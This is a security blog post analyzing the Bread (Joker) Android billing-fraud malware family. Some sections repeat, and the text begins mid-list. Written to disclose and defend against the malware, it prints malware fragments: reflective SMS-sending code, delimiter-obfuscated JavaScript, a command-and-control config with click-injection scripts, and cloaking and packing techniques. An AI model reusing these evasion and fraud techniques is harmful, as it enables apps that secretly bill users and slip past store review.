real </li> <li>The billing process commences even if you don’t hit the “Confirm” button </li> </ol> Even if the disclosure here displayed accurate information, the user would often find that the advertised functionality of the app did not match the actual content. Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps. <br /> <h1> VERSIONING</h1> Bread has also leveraged an abuse tactic unique to app stores: versioning. Some apps have started with clean versions, in an attempt to grow user bases and build the developer accounts’ reputations. Only later is the malicious code introduced, through an update. Interestingly, early “clean” versions contain varying levels of signals that the updates will include malicious code later. Some are first uploaded with all the necessary code except the one line that actually initializes the billing process. Others may have the necessary permissions, but are missing the classes containing the fraud code. And others have all malicious content removed, except for log comments referencing the payment process. All of these methods attempt to space out the introduction of possible signals in various stages, testing for gaps in the publication process. However, GPP does not treat new apps and updates any differently from an analysis perspective. <br /> <h1> FAKE REVIEWS</h1> When early versions of apps are first published, many five star reviews appear with comments like: <br /> <span id="docs-internal-guid-8eedb8d6-7fff-bd38-9c86-11bc00e9594f"><span style="color: #434343; font-family: "roboto" , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><img height="35" src="https://lh5.googleusercontent.com/FKSIFYZvO3Nno5Zt9ixuDfMsoQ4cCQ-b2o0EqMwU6ffz5e0Q4cmwU8b5W3zaBs-toygv_6q1cDzB4ld1y_zH2zH0MAs5iaddUzuHjSMOwps0mJSVn3WYmRrmOgN4Yavvww-2-eGc" style="margin-left: 0px; margin-top: 0px;" width="130" /></span></span></span><span style="color: #434343; font-family: "roboto" , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><br /></span></span> </span> <br /> <em>“So..good..”</em> <br /> <em>“very beautiful”</em> <br /> Later, 1 star reviews from <em>real</em> users start appearing with comments like: <br /> <em>“Deception”</em> <br /> <em>“The app is not honest …”</em> <br /> <h1> SUMMARY</h1> Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings. <br /> At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device. <br /> <h1> SELECTED SAMPLES</h1> <table> <tbody> <tr> <td><strong>Package Name</strong> </td> <td><strong>SHA-256 Digest</strong> </td> </tr> <tr> <td>com.rabbit.artcamera </td> <td>18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f </td> </tr> <tr> <td>org.horoscope.astrology.predict </td> <td>6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 </td> </tr> <tr> <td>com.theforest.rotatemarswallpaper </td> <td>4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 </td> </tr> <tr> <td>com.jspany.temp </td> <td>0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 </td> </tr> <tr> <td>com.hua.ru.quan </td> <td>780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 </td> </tr> <tr> <td>com.rongnea.udonood </td> <td>8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 </td> </tr> <tr> <td>com.mbv.a.wp </td> <td>01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 </td> </tr> <tr> <td>com.pho.nec.sg </td> <td>b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b </td> </tr> </tbody></table> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Alec Guertin and Vadim Kotov, Android Security & Privacy Team </span><br /> <div class="separator" style="clear: both; text-align: center;"> <span class="byline-author"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s1600/phaFamilyHighlights_Bread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1353" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s640/phaFamilyHighlights_Bread.png" width="640" /></a></span></div> <span class="byline-author"> In this edition of our <strong>PHA Family Highlights</strong> series we introduce Bread, a large-scale billing fraud family. We first started tracking Bread (also known as Joker) in early 2017, identifying apps designed solely for <a href="https://developers.google.com/android/play-protect/phacategories#billing-fraud">SMS fraud</a>. As the Play Store has introduced new policies and Google Play Protect has scaled defenses, Bread apps were forced to continually iterate to search for gaps. They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected. Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere. In this post, we show how Google Play Protect has defended against a well organized, persistent attacker and share examples of their techniques. <br /> </span><br /> <h1> <span class="byline-author"> TL;DR</span></h1> <span class="byline-author"> </span> <br /> <ul><span class="byline-author"> <li>Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users </li> <li>Bread apps originally performed SMS fraud, but have largely abandoned this for WAP billing following the introduction of <a href="https://android-developers.googleblog.com/2019/01/reminder-smscall-log-policy-changes.html">new Play policies</a> restricting use of the SEND_SMS permission and increased coverage by Google Play Protect </li> <li>More information on stats and relative impact is available in the <a href="https://www.blog.google/products/android-enterprise/look-back-2018-android-security-privacy-year-review/">Android Security 2018 Year in Review report</a> </li> </span></ul> <span class="byline-author"> </span> <h1> <span class="byline-author"> BILLING FRAUD</span></h1> <span class="byline-author"> Bread apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier. <br /> <h2> SMS Billing</h2> Carriers may partner with vendors to allow users to pay for services by SMS. The user simply needs to text a prescribed keyword to a prescribed number (shortcode). A charge is then added to the user’s bill with their mobile service provider. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s1600/billFraud.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="709" data-original-width="546" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s400/billFraud.png" width="308" /></a></div> <h2> Toll Billing</h2> Carriers may also provide payment endpoints over a web page. The user visits the URL to complete the payment and enters their phone number. Verification that the request is coming from the user’s device is completed using two possible methods: <br /> <ol> <li>The user connects to the site over mobile data, not WiFi (so the service provider directly handles the connection and can validate the phone number); or </li> <li>The user must retrieve a code sent to them via SMS and enter it into the web page (thereby proving access to the provided phone number). </li> </ol> <h2> Fraud</h2> Both of the billing methods detailed above provide device verification, but not user verification. The carrier can determine that the request originates from the user’s device, but does not require any interaction from the user that cannot be automated. Malware authors use injected clicks, custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user. <br /> <h1> STRING & DATA OBFUSCATION</h1> Bread apps have used many innovative and classic techniques to hide strings from analysis engines. Here are some highlights. <br /> <h2> Standard Encryption</h2> Frequently, Bread apps take advantage of standard crypto libraries in `java.util.crypto`. We have discovered apps using AES, Blowfish, and DES as well as combinations of these to encrypt their strings. <br /> <h2> Custom Encryption</h2> Other variants have used custom-implemented encryption algorithms. Some common techniques include: basic XOR encryption, nested XOR and custom key-derivation methods. Some variants have gone so far as to use a different key for the strings of each class. <br /> <h2> Split Strings</h2> Encrypted strings can be a signal that the code is trying to hide something. Bread has used a few tricks to keep strings in plaintext while preventing basic string matching. <br /> <pre class="prettyprint">String click_code = new StringBuilder().append(".cli").append("ck();"); </pre> Going one step further, these substrings are sometimes scattered throughout the code, retrieved from static variables and method calls. Various versions may also change the index of the split (e.g. “.clic” and “k();”). <br /> <h2> Delimiters</h2> Another technique to obfuscate unencrypted strings uses repeated delimiters. A short, constant string of characters is inserted at strategic points to break up keywords: <br /> <pre class="prettyprint">String js = "javm6voTascrm6voTipt:window.SDFGHWEGSG.catcm6voThPage(docm6voTument.getElemm6voTentsByTm6voTagName('html')[m6voT0].innerHTML);" </pre> At runtime, the delimiter is removed before using the string: <br /> <pre class="prettyprint">js = js.replaceAll("m6voT", ""); </pre> <h1> API OBFUSCATION</h1> SMS and toll fraud generally requires a few basic behaviors (for example, disabling WiFi or accessing SMS), which are accessible by a handful of APIs. Given that there are a limited number of behaviors required to identify billing fraud, Bread apps have had to try a wide variety of techniques to mask usage of these APIs. <br /> <h2> Reflection</h2> Most methods for hiding API usage tend to use Java reflection in some way. In some samples, Bread has simply directly called the Reflect API on strings decrypted at runtime. <br /> <pre class="prettyprint">Class smsManagerClass = Class.forName(p.a().decrypt("wI7HmhUo0OYTnO2rFy3yxE2DFECD2I9reFnmPF3LuAc=")); // android.telephony.SmsManager smsManagerClass.getMethod(p.a().decrypt("0oXNjC4kzLwqnPK9BiL4qw=="), // sendTextMessage String.class, String.class, String.class, PendingIntent.class, PendingIntent.class).invoke(smsManagerClass.getMethod(p.a().decrypt("xoXXrB8n1b0LjYfIYUObrA==")).invoke(null), addr, null, message, null, null); // getDefault </pre> <h2> JNI</h2> Bread has also tested our ability to analyze native code. In one sample, no SMS-related code appears in the DEX file, but there is a native method registered. <br /> <pre class="prettyprint"> public static native void nativesend(String arg0, String arg1); </pre> Two strings are passed into the call, the shortcode and keyword used for SMS billing (getter methods renamed here for clarity). <br /> <pre class="prettyprint"> JniManager.nativesend(this.get_shortcode(), this.get_keyword()); </pre> In the native library, it stores the strings to access the SMS API. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="224" data-original-width="1048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" /></a></div> The <code>nativesend</code> method uses the Java Native Interface (JNI) to fetch and call the Android SMS API. The following is a screenshot from IDA with comments showing the strings and JNI functions. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="1378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" /></a></div> <h2> WebView JavaScript Interface</h2> Continuing on the theme of cross-language bridges, Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews. The following method is declared in the DEX. <br /> <pre class="prettyprint"> public void method1(String p7, String p8, String p9, String p10, String p11) { Class v0_1 = Class.forName(p7); Class[] v1_1 = new Class[0]; Object[] v3_1 = new Object[0]; Object v1_3 = v0_1.getMethod(p8, v1_1).invoke(0, v3_1); Class[] v2_2 = new Class[5]; v2_2[0] = String.class; v2_2[1] = String.class; v2_2[2] = String.class; v2_2[3] = android.app.PendingIntent.class; v2_2[4] = android.app.PendingIntent.class; reflect.Method v0_2 = v0_1.getMethod(p9, v2_2); Object[] v2_4 = new Object[5]; v2_4[0] = p10; v2_4[1] = 0; v2_4[2] = p11; v2_4[3] = 0; v2_4[4] = 0; v0_2.invoke(v1_3, v2_4); } </pre> Without context, this method does not reveal much about its intended behavior, and there are no calls made to it anywhere in the DEX. However, the app does create a WebView and registers a JavaScript interface to this class. <br /> <pre class="prettyprint">this.webView.addJavascriptInterface(this, "stub"); </pre> This gives JavaScript run in the WebView access to this method. The app loads a URL pointing to a Bread-controlled server. The response contains some basic HTML and JavaScript. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" /></a></div> In green, we can see the references to the SMS API. In red, we see those values being passed into the suspicious Java method through the registered interface. Now, using these strings <code>method1</code> can use reflection to call <code>sendTextMessage</code> and process the payment. <br /> <h1> PACKING</h1> In addition to implementing custom obfuscation techniques, apps have used several commercially available packers including: Qihoo360, AliProtect and SecShell. <br /> More recently, we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK. Earlier this year, we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using <code>DexClassLoader</code>. <br /> The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="736" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" /></a></div> After we blocked those samples, they moved a significant portion of malicious functionality into the native library, which resulted in a rather peculiar back and forth between Dalvik and native code: <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="407" data-original-width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" /></a></div> <h1> COMMAND & CONTROL</h1> <h2> Dynamic Shortcodes & Content</h2> Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details. In the example server response below, the green fields show text to be shown to the user. The red fields are used as the shortcode and keyword for SMS billing. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="1160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" /></a></div> <h2> State Machines</h2> Since various carriers implement the billing process differently, Bread has developed several variants containing generalized state machines implementing all possible steps. At runtime, the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server. The configuration contains a list of steps to execute with URLs and JavaScript. <br /> <pre class="prettyprint">{ "message":"Success", "result":[ { "list":[ { "endUrl":"http://sabai5555.com/", "netType":0, "number":1, "offerId":"1009", "step":1, "trankUrl": "http://atracking-auto.appflood.com/transaction/post_click?offer_id=19190660&aff_id=10336" }, { "netType":0, "number":2, "offerId":"1009", "params":"function jsFun(){document.getElementsByTagName('a')[1].click()};", "step":2 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/InformationPage", "netType":0, "number":3, "offerId":"1009", "params":"javascript:jsFun()", "step":4 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/SuccessPage", "netType":0, "number":4, "offerId":"1009", "params":"javascript:getOk()", "step":3 }, { "netType":0, "number":5, "offerId":"1009", "step":7 } ], "netType":0, "offerId":"1009" } ], "code":"200" } </pre> The steps implemented include: <br /> <ul> <li>Load a URL in a WebView </li> <li>Run JavaScript in WebView </li> <li>Toggle WiFi state </li> <li>Toggle mobile data state </li> <li>Read/modify SMS inbox </li> <li>Solve captchas </li> </ul> <h3> Captchas</h3> One of the more interesting states implements the ability to solve basic captchas (obscured letters and numbers). First, the app creates a JavaScript function to call a Java method, <code>getImageBase64</code>, exposed to WebView using <code>addJavascriptInterface</code>. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="306" data-original-width="1142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" /></a></div> The value used to replace <code>GET_IMG_OBJECT</code> comes from the JSON configuration. <br /> <pre class="prettyprint">"params": "document.getElementById('captcha')" </pre> The app then uses JavaScript injection to create a new script in the carrier’s web page to run the new function. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="245" data-original-width="1158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" /></a></div> The base64-encoded image is then uploaded to an image recognition service. If the text is retrieved successfully, the app uses JavaScript injection again to submit the HTML form with the captcha answer. <br /> <h1> CLOAKING</h1> <h2> Client-side Carrier Checks</h2> In our basic command & control example above, we didn’t address the (incorrectly labeled) “imei” field. <br /> <pre class="prettyprint">{ "button": "ยินดีต้อนรับ", "code": 0, "content": "F10", "imei": "52003,52005,52000", "rule": "Here are all the pictures you need, about happiness, beauty, beauty, etc., with our most sincere service, to provide you with the most complete resources.", "service": "4219245" } </pre> This contains the Mobile Country Code (MCC) and Mobile Network Code (MNC) values that the billing process will work for. In this example, the server response contains several values for Thai carriers. The app checks if the device’s network matches one of those provided by the server. If it does, it will commence with the billing process. If the value does not match, the app skips the “disclosure” page and billing process and brings the user straight to the app content. <br /> In some versions, the server would only return valid responses several days after the apps were submitted. <br /> <h2> Server-side Carrier Checks</h2> In the JavaScript bridge API obfuscation example covered above, the server supplied the app with the necessary strings to complete the billing process. However, analysts may not always see the indicators of compromise in the server’s response. <br /> In this example, the requests to the server take the following form: <br /> <pre class="prettyprint">http://X.X.X.X/web?operator=52000&id=com.battery.fakepackage&deviceid=deadbeefdeadbeefdeadbeefdeadbeef </pre> Here, the “operator” query parameter is the Mobile Country Code and Mobile Network Code . The server can use this information to determine if the user’s carrier is one of Bread’s targets. If not, the response is scrubbed of the strings used to complete the billing fraud. <br /> <pre class="prettyprint"><a onclick="Sub()">ไปเดี๋ยวนี้</a> <div style="display:none"> <p id="deviceid">deadbeefdeadbeefdeadbeefdeadbeef</p> <p id="cmobi"></p> <p id="deni"></p> <p id="ssm"></p> <p id="shortcode"></p> <p id="keyword"></p> </div> </pre> <h1> MISLEADING USERS</h1> Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure, showing <strong>terms and conditions</strong> or a <strong>confirm</strong> button. However, the actual text would often only display a basic welcome message. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s1600/pastedimage0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s400/pastedimage0.png" width="240" /></a></div> <em>Translation: “This app is a place to be and it will feel like a superhero with this new app. We hope you enjoy it!”</em> <br /> Other versions included all the pieces needed for a valid disclosure message. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s1600/pastedImage0%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s400/pastedImage0%25281%2529.png" width="240" /></a></div> When translated the disclosure reads: <br /> <em>“Apply Car Racing Clip \n Please enter your phone number for service details. \n Terms and Conditions \nFrom 9 Baht / day, you will receive 1 message / day. \nPlease stop the V4 printing service at 4739504 \n or call 02-697-9298 \n Monday - Friday at 8.30 - 5.30pm \n”</em> <br /> However, there are still two issues here: <br /> <ol> <li>The numbers to contact for cancelling the subscription are not real </li> <li>The billing process commences even if you don’t hit the “Confirm” button </li> </ol> Even if the disclosure here displayed accurate information, the user would often find that the advertised functionality of the app did not match the actual content. Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps. <br /> <h1> VERSIONING</h1> Bread has also leveraged an abuse tactic unique to app stores: versioning. Some apps have started with clean versions, in an attempt to grow user bases and build the developer accounts’ reputations. Only later is the malicious code introduced, through an update. Interestingly, early “clean” versions contain varying levels of signals that the updates will include malicious code later. Some are first uploaded with all the necessary code except the one line that actually initializes the billing process. Others may have the necessary permissions, but are missing the classes containing the fraud code. And others have all malicious content removed, except for log comments referencing the payment process. All of these methods attempt to space out the introduction of possible signals in various stages, testing for gaps in the publication process. However, GPP does not treat new apps and updates any differently from an analysis perspective. <br /> <h1> FAKE REVIEWS</h1> When early versions of apps are first published, many five star reviews appear with comments like: <br /> <span id="docs-internal-guid-8eedb8d6-7fff-bd38-9c86-11bc00e9594f"><span style="color: #434343; font-family: "roboto" , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><img height="35" src="https://lh5.googleusercontent.com/FKSIFYZvO3Nno5Zt9ixuDfMsoQ4cCQ-b2o0EqMwU6ffz5e0Q4cmwU8b5W3zaBs-toygv_6q1cDzB4ld1y_zH2zH0MAs5iaddUzuHjSMOwps0mJSVn3WYmRrmOgN4Yavvww-2-eGc" style="margin-left: 0px; margin-top: 0px;" width="130" /></span></span></span><span style="color: #434343; font-family: "roboto" , sans-serif; font-size: 14pt; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 35px; overflow: hidden; width: 130px;"><br /></span></span> </span> <br /> <em>“So..good..”</em> <br /> <em>“very beautiful”</em> <br /> Later, 1 star reviews from <em>real</em> users start appearing with comments like: <br /> <em>“Deception”</em> <br /> <em>“The app is not honest …”</em> <br /> <h1> SUMMARY</h1> Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings. <br /> At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device. <br /> <h1> SELECTED SAMPLES</h1> <table> <tbody> <tr> <td><strong>Package Name</strong> </td> <td><strong>SHA-256 Digest</strong> </td> </tr> <tr> <td>com.rabbit.artcamera </td> <td>18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f </td> </tr> <tr> <td>org.horoscope.astrology.predict </td> <td>6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 </td> </tr> <tr> <td>com.theforest.rotatemarswallpaper </td> <td>4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 </td> </tr> <tr> <td>com.jspany.temp </td> <td>0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 </td> </tr> <tr> <td>com.hua.ru.quan </td> 